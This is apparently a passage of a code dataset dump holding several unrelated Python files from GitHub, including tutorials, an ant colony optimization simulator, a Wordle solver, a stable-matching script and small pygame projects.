created.\\n\" % name)\r\n","repo_name":"mozman/dxfwrite","sub_path":"examples/bezier.py","file_name":"bezier.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"39"} +{"seq_id":"11889819667","text":"# type casting = convert the data type of value to another data type\n\nx = 1 #int\ny = 2.0 #float\nz = \"3\" #str\n\nx = int(x)\ny = int(y)\nz = int(z)\n\n# 1\n# 2\n# 9\n\nx = float(x)\ny = float(y)\nz = float(z)\n\n# 1.0\n# 2.0\n# 9.0\n\nx = str(x)\ny = str(y)\nz = str(z)\n\n# 1\n# 2.0\n# 333\n\nprint(x)\nprint(y)\nprint(z*3)\n","repo_name":"abhmora1011/Robot_Python","sub_path":"PythonEssentials/4.TypeCast.py","file_name":"4.TypeCast.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"35535073155","text":"import math \r\nimport random\r\nimport turtle \r\n\r\n### Turtle Functions ###\r\ns = turtle.getscreen()\r\nant = turtle.Turtle()\r\nant.shape(\"circle\")\r\nant.shapesize(0.9,0.9,0)\r\nantSpeed = \"normal\"\r\n\r\ntotalPopulation = 0 # Later set to number of ants times number of rounds\r\n\r\ndef drawCities(cityMatrix): # Draw each city as circles with index number\r\n style = (\"Courier\", 30)\r\n ant.pensize(4)\r\n for i in range(len(cityMatrix)):\r\n ant.up()\r\n\r\n ant.goto(cityMatrix[i][0],cityMatrix[i][1])\r\n ant.down()\r\n ant.circle(30)\r\n ant.write(i,font=style)\r\n \r\ndef initAnt(cityMatrix):\r\n ant.speed(antSpeed)\r\n ant.up()\r\n ant.goto(cityMatrix[0][0],cityMatrix[0][1])\r\n ant.down()\r\n\r\ndef changeLineStyle(frequency):\r\n ant.pensize(1+(2*frequency/totalPopulation)*10) #Make line width relative to route frequency\r\n if frequency < .7*totalPopulation*0.33: # Chance line color depending on route frequency\r\n ant.pencolor(\"red\")\r\n elif frequency < .7*totalPopulation*0.67:\r\n ant.pencolor(\"yellow\")\r\n else:\r\n ant.pencolor(\"green\")\r\n\r\n### Helper Functions ###\r\n\r\ndef displayMatrix(matrix):\r\n rows = len(matrix)\r\n cols = len(matrix[0])\r\n for x in range(rows):\r\n print(\"\\n\")\r\n print(x,\"| \", end=\" \")\r\n for y in range(cols):\r\n print(matrix[x][y], \",\", end=\" \")\r\n \r\ndef displayDistanceMatrix():\r\n print(\"\\n\\nDistance Matrix\")\r\n displayMatrix(distanceMatrix)\r\n \r\ndef displayPheromoneMatrix():\r\n print(\"\\n\\nPheromone Matrix\")\r\n displayMatrix(pheromoneMatrix)\r\n \r\ndef displayRouteFrequencyMatrix():\r\n print(\"\\n\\nRoute Frequency Matrix\")\r\n displayMatrix(routeFrequencyMatrix)\r\n\r\n\r\n### Input cities and their coordinates ###\r\n\r\nnumberOfCities = 0\r\ncitiesList = []\r\ncityCoordsMatrix = []\r\n\r\ndef loadCities():\r\n print(\"Please input city data (name x-coord y-coord) in this format: city x y\\n\")\r\n print(\"Do not include punctuation. Input errors require program restart.\")\r\n for z in range(numberOfCities):\r\n city, x, y = input(str(z)+\". 
Enter (City x y): \").split()\r\n citiesList.append(city)\r\n cityCoordsMatrix.append([int(x),int(y)])\r\n \r\ndef displayCitiesInfo():\r\n print(\"[city x y]: \\n\")\r\n for i in range(numberOfCities):\r\n print(citiesList[i], cityCoordsMatrix[i][0], cityCoordsMatrix[i][1], \"\\n\")\r\n\r\n### Calculate distance from coordinates and create matrix\r\n\r\ndistanceMatrix = []\r\n\r\ndef calculateDistance(coord1, coord2):\r\n return round(math.sqrt((coord1[1]-coord2[1])**2+(coord1[0]-coord2[0])**2),2)\r\n \r\ndef fillDistanceMatrix():\r\n for i in range(numberOfCities):\r\n distanceMatrix.append([calculateDistance (cityCoordsMatrix[i], cityCoordsMatrix[0])])\r\n for j in range(1,numberOfCities):\r\n distanceMatrix[i].append( calculateDistance (cityCoordsMatrix[i], cityCoordsMatrix[j]) )\r\n\r\n### Initalize matrices and data for traveling routes ###\r\n\r\nrouteFrequencyMatrix = [] #Stores number of times each route is visited\r\npheromoneMatrix = [] # Stores pheromone levels per route\r\n\r\nalpha = 1 # Controls influence of pheromones on decision making\r\nbeta = 1 # Controls influence of distance. \r\n\r\n### Sub functions for running a single trip. ###\r\n\r\ntripsLog = [] # Records every trip\r\nisFirstRound = True # Omits influence of pheromones on very first round\r\n \r\ndef calculatePheromones(currNode, nextNode):\r\n return (pheromoneMatrix[currNode][nextNode] + pheromoneMatrix[nextNode][currNode])**alpha\r\n\r\ndef calculateVisibility(currNode, nextNode): # Visibility = measure of how close next node is from current\r\n return (1/distanceMatrix[currNode][nextNode])**beta # Higher visibility = geographically closer\r\n \r\ndef calculateFitness(route, routes, firstTrip):\r\n aggFactor = 0\r\n if firstTrip: # If firstTrip:\r\n selfFactor = route[\"visibility\"] # Only use visibility for fitness \r\n for i in range(len(routes)):\r\n aggFactor += routes[i][\"visibility\"]\r\n route[\"fitness\"] = selfFactor/aggFactor\r\n else: # Otherwise:\r\n selfFactor = route[\"pheromones\"]*route[\"visibility\"] # Route's pheromone**alpha * visibility**beta\r\n for i in range(len(routes)):\r\n aggFactor += routes[i][\"pheromones\"]*routes[i][\"visibility\"] # divided by aggregate of all routes' pher**alpha * vis**beta\r\n route[\"fitness\"] = selfFactor/aggFactor # equals fitness. 
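\r\n# Illustrative walk-through of the roulette-wheel draw implemented in chooseRoute() below\r\n# (the numbers are hypothetical): with remaining-route fitnesses of 0.5, 0.3 and 0.2, a\r\n# randomNumber of 0.60 is not <= 0.50, so previousLimit grows to 0.50; then 0.60 <= 0.50 + 0.30,\r\n# so the second route is returned. Larger fitness means a proportionally larger bucket.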
\r\n \r\ndef chooseRoute(validRoutes): # Standard relative probability selection \r\n randomNumber = random.randint(1,100)/100\r\n routeFound = False\r\n previousLimit = 0\r\n for i in range(len(validRoutes)):\r\n if randomNumber <= previousLimit + validRoutes[i][\"fitness\"]:\r\n routeFound = True\r\n return validRoutes[i]\r\n else:\r\n previousLimit += validRoutes[i][\"fitness\"]\r\n if routeFound == False:\r\n return validRoutes[len(validRoutes)-1]\r\n \r\ndef removeRoute(nextNode, routesList): # Remove node from \"valid next nodes\" when selected \r\n for i in range(len(routesList)):\r\n if routesList[i][\"nextNode\"] == nextNode:\r\n del routesList[i]\r\n return None\r\n \r\ndef updateFrequencyMatrix(prevNode, nextNode):\r\n routeFrequencyMatrix[prevNode][nextNode] += 1\r\n \r\ndef loadInitialRoutes():\r\n routes = []\r\n for i in range(numberOfCities-1):\r\n routes.append({\"nextNode\": i+1})\r\n return routes\r\n\r\n### To run a single trip ###\r\n\r\ndef runTrip():\r\n \r\n thisTrip = [0]\r\n availableRoutes = loadInitialRoutes()\r\n currNode = 0\r\n nextNode = None\r\n # For each route possibility (there are n-1 possible routes per trip, where n=number of nodes)\r\n for i in range(numberOfCities-1): \r\n for j in range(len(availableRoutes)): # calculate influence factors\r\n availableRoutes[j][\"pheromones\"] = calculatePheromones(currNode, availableRoutes[j][\"nextNode\"]) \r\n availableRoutes[j][\"visibility\"] = calculateVisibility(currNode, availableRoutes[j][\"nextNode\"])\r\n for k in range(len(availableRoutes)): # calculate fitness \r\n calculateFitness(availableRoutes[k], availableRoutes, isFirstRound)\r\n nextRoute = chooseRoute(availableRoutes) # choose a route\r\n nextNode = nextRoute[\"nextNode\"]\r\n thisTrip.append(nextNode) # record the route\r\n updateFrequencyMatrix(currNode, nextNode) \r\n changeLineStyle(routeFrequencyMatrix[currNode][nextNode])\r\n removeRoute(nextNode, availableRoutes) # remove chosen route as valid destination\r\n if i == numberOfCities-2: # if one city, left go home\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n currNode = nextNode\r\n nextNode = 0\r\n else: # otherwise prep for next route of trip\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n currNode = nextNode\r\n nextNode = None\r\n updateFrequencyMatrix(currNode, nextNode)\r\n ant.goto(cityCoordsMatrix[nextNode][0],cityCoordsMatrix[nextNode][1])\r\n tripsLog.append(thisTrip)\r\n \r\n### To run a round ###\r\n\r\nQ = 5 # Quantity; determines potency of pheromones; or, how much deposited per unit length\r\npDecay = 0.5 # How much pheromone REMAINS after one unit of time (this case after each round)\r\n\r\nnumberOfAnts = 0 # How many ants will travel the routes this round (how many trips/round)\r\n\r\ndef updatePheromoneMatrix():\r\n for i in range(numberOfCities):\r\n for j in range(numberOfCities):\r\n # if first round don't include 'prior' pheromones in calculations\r\n if distanceMatrix[i][j] != 0 and isFirstRound:\r\n pheromoneMatrix[i][j] = routeFrequencyMatrix[i][j]*(Q/distanceMatrix[i][j]) \r\n # next round lvl = prev round level * decay rate * quantity traveled * Q / length of route \r\n if distanceMatrix[i][j] != 0 and isFirstRound == False:\r\n pheromoneMatrix[i][j] = pheromoneMatrix[i][j]*(pDecay)*routeFrequencyMatrix[i][j]*(Q/distanceMatrix[i][j]) \r\n \r\ndef runRound():\r\n initAnt(cityCoordsMatrix)\r\n for i in range(numberOfAnts):\r\n runTrip()\r\n updatePheromoneMatrix()\r\n \r\n### To run a sim 
###\r\nprint(\"-----------------------------------------------------\")\r\nprint(\"| Welcome to the Ant Colony Optimization Simulator! |\")\r\nprint(\"-----------------------------------------------------\\n\")\r\n\r\n\r\nvalidResponseDemo = False\r\n\r\nwhile validResponseDemo == False:\r\n print(\"The creator of this program has a suggested list of cities that best demonstrate this simulation. Would you like to try it? y/n: \")\r\n demoResponse = input()\r\n if demoResponse == 'y':\r\n validResponseDemo = True\r\n numberOfCities = 10\r\n citiesList = [\"CA\",\"WA\", \"WY\", \"IL\", \"NY\", \"KY\", \"AR\", \"FL\", \"NM\", \"MX\"]\r\n cityCoordsMatrix = [[-300,0],[-225,250],[-150,150],[0,75],[300,250],[300,0],[0,-75],[300,-250],[-150,-150],[-225,-250]]\r\n print(\"Great. Here's some info about the cities. \\n\")\r\n displayCitiesInfo()\r\n \r\n elif demoResponse =='n' :\r\n validResponseDemo = True\r\n numberOfCities = int(input(\"\\nThat's fine too! How many cities would you like to input? : \"))\r\n loadCities()\r\n \r\n else:\r\n print(\"I'm sorry, that's not an input I was expecting. Can you try again?\")\r\n\r\npheromoneMatrix =[[0]*numberOfCities for i in range(numberOfCities)]\r\nrouteFrequencyMatrix = [[0]*numberOfCities for i in range(numberOfCities)] \r\ndrawCities(cityCoordsMatrix)\r\nfillDistanceMatrix()\r\n\r\nnumberOfRounds = int(input(\"\\nHow many rounds would you like to run? : \"))\r\nnumberOfAnts = int(input(\"\\nHow many ants will travel each round? : \"))\r\ntotalPopulation = numberOfAnts*numberOfRounds\r\n\r\nvalidResponseSpeed = False\r\nwhile validResponseSpeed == False:\r\n print(\"Finally, choose the ants' speed- \\n{'normal', 'fast', 'fastest', 'slow', 'slowest'}: \\n\")\r\n speedResponse = input()\r\n if speedResponse == \"normal\" or \"fast\" or \"fastest\" or \"slow\" or \"slowest\":\r\n validResponseSpeed = True\r\n antSpeed = speedResponse\r\n else:\r\n print(\"I'm sorry, that's not an input I was expecting. 
Can you try again?\")\r\n \r\n\r\n\r\nprint(\"\\nStarting...\\n\")\r\nfor i in range(numberOfRounds):\r\n print(\"\\n\\n---- Round\", i+1, \"----\")\r\n runRound()\r\n isFirstRound = False;\r\n displayRouteFrequencyMatrix()\r\n displayPheromoneMatrix()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n","repo_name":"sungmin-gan/AntColonyOptimization","sub_path":"ACOvsTSP.py","file_name":"ACOvsTSP.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"69941110195","text":"from django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '0003_auto_20150211_1738'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='job',\n name='company',\n ),\n migrations.AlterField(\n model_name='job',\n name='company_name',\n field=models.CharField(null=True, max_length=100),\n preserve_default=True,\n ),\n ]\n","repo_name":"python/pythondotorg","sub_path":"jobs/migrations/0004_auto_20150216_1544.py","file_name":"0004_auto_20150216_1544.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"39"} +{"seq_id":"23189113623","text":"from turtle import circle\nimport pyglet as pyg\nimport math\nimport time\nimport movement\nimport crashDetection\nimport car\nimport trackCreate\nimport walls\nimport AiSight\n\nx = 185.0\ny = 432.0\nrotate = 0.0\nxSpeed = 0.0\nySpeed = 0.0\nfriction = 1.08\nvelocity = 0.0\nsteer = 0.0\nHideTrack = False\ndisplay = pyg.canvas.Display()\nscreen = display.get_default_screen()\nscreen_width = screen.width\nscreen_height = screen.height\n\nmodifyerScaleX = screen_width / 1920\nmodifyerScaleY = screen_height / 1080\nx = x * modifyerScaleX\ny = y * modifyerScaleY \n\n\n\nraceTrack = trackCreate.track(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\ntrack = raceTrack.loadTrack()\n\ntrackWalls = walls.walls(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\npitch, pixels = trackWalls.loacteWalls()\n\nwindow = pyg.window.Window(screen.width,screen.height, fullscreen = True)\ntrack.blit(0,0)\n\n\npreCar = car.carBuild(screen_width, screen_height, modifyerScaleX, modifyerScaleY)\ncar = preCar.sprite()\n\n\n\n\n\nkeysPressed = []\n@window.event\ndef on_key_press(symbol, modifiers):\n keysPressed.append(symbol)\n@window.event\ndef on_key_release(symbol, modifiers):\n if symbol in keysPressed:\n keysPressed.remove(symbol)\n\n# def pDraw(player):\n# playerDraw = player\n# playerDraw.rotation = math.degrees(rotate)\n# playerDraw.draw()\n@window.event\ndef draw(dt):\n global x\n global y\n global rotate\n global xSpeed\n global ySpeed\n global friction\n global velocity\n global steer\n global pitch\n global pixels\n global HideTrack\n angles = [0,15,30,45,60,75]\n window.clear()\n \n player = pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n\n move = movement.movement(dt, x, y, rotate, keysPressed,modifyerScaleX, modifyerScaleY, friction, velocity, xSpeed, ySpeed, steer)\n x, y, rotate, velocity, xSpeed, ySpeed, steer, reset = move.keys()\n HideTrack = move.swap(HideTrack)\n if HideTrack == True:\n for i in angles:\n line = AiSight.sight(x,y,rotate,pixels,pitch,i)\n line.line()\n else:\n track.blit(0,0)\n player = 
pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n player.draw()\n crash = crashDetection.crash(x, y, rotate, xSpeed, ySpeed, pitch, pixels, modifyerScaleX, modifyerScaleY, velocity, steer)\n x, y, rotate, velocity, xSpeed, ySpeed, steer, reset = crash.crashCheck()\n if reset: \n player = pyg.sprite.Sprite(car, x , y, subpixel= True)\n player.rotation = math.degrees(rotate)\n player.draw()\n reset = False\n time.sleep(0.75)\n \n\n \n\npyg.clock.schedule_interval(draw, 1/60)\npyg.app.run()\n","repo_name":"GreenFrog-Hub/RacingCarGame","sub_path":"Code/RaceCarGame.py","file_name":"RaceCarGame.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36367030971","text":"from typing import List, Dict\ndef groupAnagrams(strs: List[str]):\n frequency: Dict = dict()\n result: List[List[str]] = []\n for s in strs:\n temp = \"\".join(sorted(s))\n if temp in frequency:\n result[frequency[temp]].append(s)\n else:\n result.append([s])\n frequency[temp] = len(result)-1\n print(result)\n\n\nstrs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\ngroupAnagrams(strs)","repo_name":"purohitshubham1998/interview-questions","sub_path":"leet_code/49_group_anagrams.py","file_name":"49_group_anagrams.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"33122309773","text":"import pygame as pg\nfrom assets_loader import Asset\n\n\nclass LevelTile(pg.sprite.Sprite):\n def __init__(self, image: Asset, pos: tuple, groups) -> None:\n super().__init__(groups)\n self.image = image.surface\n self.metadata = image.metadata\n self.rect = self.image.get_rect(topleft=pos)\n","repo_name":"MarcoTorres04/game-maker","sub_path":"game_maker/play/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20197373632","text":"#! /usr/bin/env python3\n\nimport argparse\nimport collections\nfrom enum import Enum\nfrom fractions import Fraction\nimport math\nimport pathlib\nimport time\nfrom typing import List, Tuple, Dict, Set, Optional\n\nparser = argparse.ArgumentParser(description='Wordle solver')\nparser.add_argument(\n '--dictionary',\n help='Dictionary to use',\n type=pathlib.Path,\n default='wordle_dictionary.txt',\n )\n\nparser.add_argument(\n '--hints',\n help=\"\"\"\n Hints received so far. 
Example: aahed:GRRYR,abuse:GRRRG,atoke:GRRRG\n\n G: green\n Y: yellow\n R: gray\n \"\"\",\n type=str,\n default='',\n)\n\nparser.add_argument(\n '--log_interval',\n help='Log progress every N seconds',\n type=float,\n default=1,\n)\n\nclass HintPiece(Enum):\n GREEN = 'GREEN'\n YELLOW = 'YELLOW'\n GRAY = 'GRAY'\n\n def __repr__(self):\n return self.value\n\n# I don't know how to manage namespaces cleanly.\nGREEN = HintPiece.GREEN\nYELLOW = HintPiece.YELLOW\nGRAY = HintPiece.GRAY\n\ndef brief_hint_piece(hint_piece: HintPiece) -> str:\n if hint_piece == GREEN:\n return 'G'\n elif hint_piece == YELLOW:\n return 'Y'\n elif hint_piece == GRAY:\n return 'R'\n else:\n raise ValueError('Unknown hint piece: {}'.format(hint_piece))\n\ndef brief_hint(hint: Tuple[HintPiece]) -> str:\n return ''.join(brief_hint_piece(h) for h in hint)\n\nALL_GREEN = (GREEN, GREEN, GREEN, GREEN, GREEN)\n\ndef hint(actual, guess):\n \"\"\"Returns the hint for the word guessed.\n\n >>> hint('abcd', 'abcd')\n (GREEN, GREEN, GREEN, GREEN)\n >>> hint('abcd', 'dcba')\n (YELLOW, YELLOW, YELLOW, YELLOW)\n >>> hint('abcde', 'edcba')\n (YELLOW, YELLOW, GREEN, YELLOW, YELLOW)\n >>> hint('xxxxx', 'bacon')\n (GRAY, GRAY, GRAY, GRAY, GRAY)\n >>> hint('xaaax', 'xxaaa')\n (GREEN, YELLOW, GREEN, GREEN, YELLOW)\n >>> hint('aabbc', 'bbxxa')\n (YELLOW, YELLOW, GRAY, GRAY, YELLOW)\n >>> hint('bbxxa', 'aabbc')\n (YELLOW, GRAY, YELLOW, YELLOW, GRAY)\n >>> hint('abaci','bacon')\n (YELLOW, YELLOW, YELLOW, GRAY, GRAY)\n >>> hint('bacon', 'abaci')\n (YELLOW, YELLOW, GRAY, YELLOW, GRAY)\n \"\"\"\n if len(actual) != len(guess):\n raise ValueError('Word lengths must match')\n\n floating_letter_counts = collections.Counter(actual)\n for ac, gc in zip(actual, guess):\n if ac == gc:\n floating_letter_counts[ac] -= 1\n\n out = []\n for ac, gc in zip(actual, guess):\n if ac == gc:\n out.append(GREEN)\n elif floating_letter_counts[gc] > 0:\n out.append(YELLOW)\n floating_letter_counts[gc] -= 1\n else:\n out.append(GRAY)\n\n return tuple(out)\n\nGuessWithExpectation = collections.namedtuple('GuessWithExpectation', ['guess', 'expected_after'])\nclass Run:\n def __init__(self, guessable_words, log_sink=None):\n self._guessable_words = guessable_words\n self._log_sink = log_sink\n self._knowledge_states_seen = {}\n self._knowledge_states_visited = 0\n\n def log(self, *args):\n if self._log_sink is None:\n return\n\n self._log_sink(\n len(self._knowledge_states_seen),\n self._knowledge_states_visited,\n len(self._knowledge_states_seen) / self._knowledge_states_visited,\n *args)\n\n def best_guess(self, possibilities: Tuple[str], guesses_made, stack=[]) -> GuessWithExpectation:\n self._knowledge_states_visited += 1\n memoization_key = (guesses_made, possibilities)\n if memoization_key not in self._knowledge_states_seen:\n values = []\n for i, guess in enumerate(self._guessable_words):\n values.append(\n GuessWithExpectation(guess,\n self.expected_guesses_after(\n possibilities,\n guess,\n guesses_made+1,\n stack=stack + [len(possibilities), i+1, guess])),\n )\n best = min(\n values,\n key=lambda g: g.expected_after,\n )\n self.log(stack, 'best guess:', best.guess, float(best.expected_after))\n self._knowledge_states_seen[memoization_key] = min(values, key=lambda g: g.expected_after)\n return self._knowledge_states_seen[memoization_key]\n\n def expected_guesses_after(self, possibilities: Tuple[str], guess, guesses_made, stack=[]) -> Fraction:\n if guesses_made > 6:\n return math.inf\n\n remaining_guesses_distribution = collections.Counter()\n 
hint_subpossibilities = possibilities_by_hint(possibilities, guess)\n for hint_, sub_possibilities in hint_subpossibilities.items():\n sub_possibilities = tuple(sub_possibilities)\n\n sub_stack = stack + [brief_hint(hint_)]\n self.log(sub_stack)\n assert len(sub_possibilities) > 0\n\n if hint_ == ALL_GREEN:\n assert len(sub_possibilities) == 1\n remaining_guesses_distribution[0] += 1\n else:\n # This implies that you will learn absolutely nothing by\n # making the guess. So, don't!\n if len(sub_possibilities) == len(possibilities):\n return math.inf\n\n g = self.best_guess(sub_possibilities, guesses_made+1, stack=sub_stack)\n remaining_guesses_distribution[g.expected_after + 1] += len(sub_possibilities)\n\n # Can't use inf as the numerator because it's not a valid Fraction.\n numerator = sum(k * v for k, v in remaining_guesses_distribution.items())\n if numerator == math.inf:\n return math.inf\n\n return Fraction(\n numerator,\n sum(remaining_guesses_distribution.values()),\n )\n\ndef possibilities_by_hint(possibilities, guess):\n possibilities_by_hint = collections.defaultdict(list)\n for actual in possibilities:\n possibilities_by_hint[hint(actual, guess)].append(actual)\n return possibilities_by_hint\n\ndef parse_hint_piece(hint_piece: str) -> HintPiece:\n if hint_piece == 'G':\n return GREEN\n elif hint_piece == 'Y':\n return YELLOW\n elif hint_piece == 'R':\n return GRAY\n else:\n raise ValueError('Unknown hint piece: {}'.format(hint_piece))\n\ndef parse_hint(hintstr: str):\n return tuple(map(parse_hint_piece, hintstr))\n\ndef parse_hints(all_hints: str):\n if all_hints == '':\n return\n for chunk in all_hints.split(','):\n word, hintstr = chunk.split(':')\n yield word, parse_hint(hintstr)\n\nclass IntervalLogger:\n def __init__(self, interval):\n self._last_logged = 0\n self._interval = interval\n\n def log(self, *args):\n if time.time() - self._last_logged > self._interval:\n print(*args)\n self._last_logged = time.time()\n\nif __name__ == '__main__':\n import doctest\n failures, _ = doctest.testmod()\n assert failures == 0\n\n args = parser.parse_args()\n WORDS = tuple(args.dictionary.read_text().splitlines())\n print(len(WORDS), 'words loaded from', args.dictionary)\n\n possibilities = WORDS\n hints = list(parse_hints(args.hints))\n for word, hint_ in hints:\n pbh = possibilities_by_hint(possibilities, word)\n if hint_ not in pbh:\n print('No possibilities after hint', hint_)\n exit(1)\n possibilities = pbh[hint_]\n print(word, hint_, len(possibilities), 'possibilities remain')\n if len(possibilities) < 10:\n print('Possibilities:', sorted(possibilities))\n\n logger = IntervalLogger(args.log_interval)\n run = Run(guessable_words=WORDS, log_sink=logger.log)\n best_guess = run.best_guess(tuple(possibilities), guesses_made=len(hints))\n print(f'Best guess: \"{best_guess.guess}\", which should get the right answer in {float(best_guess.expected_after+1):.2f} guesses on average')\n","repo_name":"orborde/wordle","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"11575695071","text":"import copy\nimport time\nimport json\nwith open('10_couples_male.json') as f:\n guyprefers = json.load(f)\nwith open('10_couples_female.json') as f2:\n galprefers = json.load(f2)\nguys = sorted(guyprefers.keys())\ngals = sorted(galprefers.keys())\nprint(guyprefers)\nprint(galprefers)\ndef sorting(messed_order,correct_order):\n return [x for x in correct_order if 
x in messed_order]\ndef duplicate_remover(seq):\n seen = set()\n seen_add = seen.add\n return [ x for x in seq if x not in seen and not seen_add(x)]\ndef check(engaged):\n inverseengaged = dict((v,k) for k,v in engaged.items())\n for she, he in engaged.items():\n shelikes = galprefers[she]\n shelikesbetter = shelikes[:shelikes.index(he)]\n helikes = guyprefers[he]\n helikesbetter = helikes[:helikes.index(she)]\n for guy in shelikesbetter:\n guysgirl = inverseengaged[guy]\n guylikes = guyprefers[guy]\n if guylikes.index(guysgirl) > guylikes.index(she):\n print(\"%s and %s like each other better than \"\n \"their present partners: %s and %s, respectively\"\n % (she, guy, he, guysgirl))\n return False\n for gal in helikesbetter:\n girlsguy = engaged[gal]\n gallikes = galprefers[gal]\n if gallikes.index(girlsguy) > gallikes.index(he):\n print(\"%s and %s like each other better than \"\n \"their present partners: %s and %s, respectively\"\n % (he, gal, she, girlsguy))\n return False\n return True\n \ndef matchmaker():\n count = 0\n guysfree = guys[:]\n engaged = {}\n guyprefers2 = copy.deepcopy(guyprefers)\n galprefers2 = copy.deepcopy(galprefers)\n while guysfree:\n probability_to_break_up = 0\n guy = guysfree.pop(0)\n guyslist = guyprefers2[guy]\n gal = guyslist.pop(0) \n fiance = engaged.get(gal)\n if not fiance:\n # She's free\n guysfree.append(guy)\n if len(guysfree) > 0:\n _guys_free = sorting(guysfree, galprefers2[gal])\n probability_to_break_up = (_guys_free.index(guy))/len(_guys_free) \n if probability_to_break_up <= 0.5:\n engaged[gal] = guy\n print(\" %s and %s\" % (guy, gal))\n guysfree.pop(guysfree.index(guy))\n else:\n guysfree.pop(guysfree.index(guy))\n guysfree.append(guy)\n else:\n # The guy proposes to an engaged girl\n galslist = galprefers2[gal]\n if galslist.index(fiance) > galslist.index(guy):\n # She prefers new guy\n engaged[gal] = guy\n print(\" %s dumped %s for %s\" % (gal, fiance, guy))\n if guyprefers2[fiance]:\n # Ex has more girls to try\n guysfree.append(fiance)\n count += 1\n else:\n # She is faithful to old fiance\n if guyslist:\n # Look again\n guysfree.append(guy)\n print()\n print('Number of break ups for new algorithm: ', count)\n '''with open(\"...Location.../Records_new.txt\", \"a\") as text_file:\n text_file.writelines(\"Number of break ups recorded for 100 couples: %s\\n\" %count)'''\n return engaged\nprint()\nprint('Engagements:')\nengaged = matchmaker()\n \nprint('\\nCouples:')\nprint(' ' + ',\\n '.join('%s is engaged to %s' % couple\n for couple in sorted(engaged.items())))\nprint()\nprint('Engagement stability check PASSED'\n if check(engaged) else 'Engagement stability check FAILED')\n","repo_name":"frostNirv/Improved-Gale-Shapley-Algorithm","sub_path":"Improved-GSA.py","file_name":"Improved-GSA.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17399940505","text":"#\n# @author xiashuo\n# @date 2023/7/4 16:54\n#\n\niter_01 = iter(\"abc\")\nprint(next(iter_01))\nprint(next(iter_01))\nprint(next(iter_01))\n# calling next again after the last element has been fetched raises StopIteration\n# the StopIteration exception marks the end of iteration and prevents an infinite loop\n# print(next(iter_01))\n# you can also pass a default value to avoid the error\nprint(next(iter_01, \"oops\"))\n\niter_02 = iter(\"abcdef\")\n# a while loop combined with the iterator's next method\n# take care to handle the StopIteration exception\n# a plain for loop, however, does not raise this error\nwhile True:\n try:\n print(next(iter_02), end=\" | \")\n except StopIteration:\n print(\"iteration finished\")\n break\n\n# iterating over a range object\niter_03 = iter(range(0, 10))\nfor x in iter_03:\n print(x, end=\" 
| \")\n\nprint()\n\n# 迭代元组\ntuple_01 = (*range(0, 10),)\niter_04 = iter(tuple_01)\nfor x in iter_04:\n print(x, end=\" | \")\n\nprint()\n\n# 迭代列表\niter_05 = iter([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\nfor x in iter_05:\n print(x, end=\" | \")\n\nprint()\n\n\n# 创建一个实现了迭代器的类\n\nclass MyIterator:\n def __iter__(self):\n self.a = 1\n return self\n\n # def __next__(self):\n # \"\"\"注意,这种实现是可以无限得带下去的\"\"\"\n # x = self.a\n # self.a += 1\n # return x\n\n def __next__(self):\n if self.a <= 10:\n x = self.a\n self.a += 1\n return x\n else:\n # StopIteration 异常用于标识迭代的完成,防止出现无限循环的情况,在 __next__() 方法中我们可以设置在完成指定循环次数后触发 StopIteration 异常来结束迭代。\n raise StopIteration\n\n\nmyIterator = MyIterator()\nmyiterObj = iter(myIterator)\nfor x in myiterObj:\n print(x, end=\" | \")\n\nprint()\n\n\n# 包含yield关键字的函数,是一个生成器函数,一个生成器函数对象,概念上就是一个迭代器,跟迭代器的用法一样\n\ndef countdown(n):\n while n > 0:\n yield n\n n -= 1\n\n\n# 创建生成器对象\n# 一个生成器对象,也是一个迭代器对象\ngenerator = countdown(5)\n# 输出 \n# 如果不包含yield 关键字,类型为 function\nprint(type(generator))\n\n# 通过迭代生成器获取值\nprint(next(generator)) # 输出: 5\nprint(next(generator)) # 输出: 4\nprint(next(generator)) # 输出: 3\n\n# 使用 for 循环迭代生成器\nfor value in generator:\n print(value) # 输出: 2 1\n\n\n# 在一个 generator function 中,如果没有 return,则默认执行至函数完毕,如果在执行过程中 return,则直接抛出 StopIteration 终止迭代。\n# 带有return的生成器\ndef countdown_with_return(n):\n while n > 0:\n yield n\n n -= 1\n if n == 2:\n # 使用该return则排出错误\n # 抛出错误 StopIteration\n return\n\n\ngenerator_with_return = countdown_with_return(3)\n# 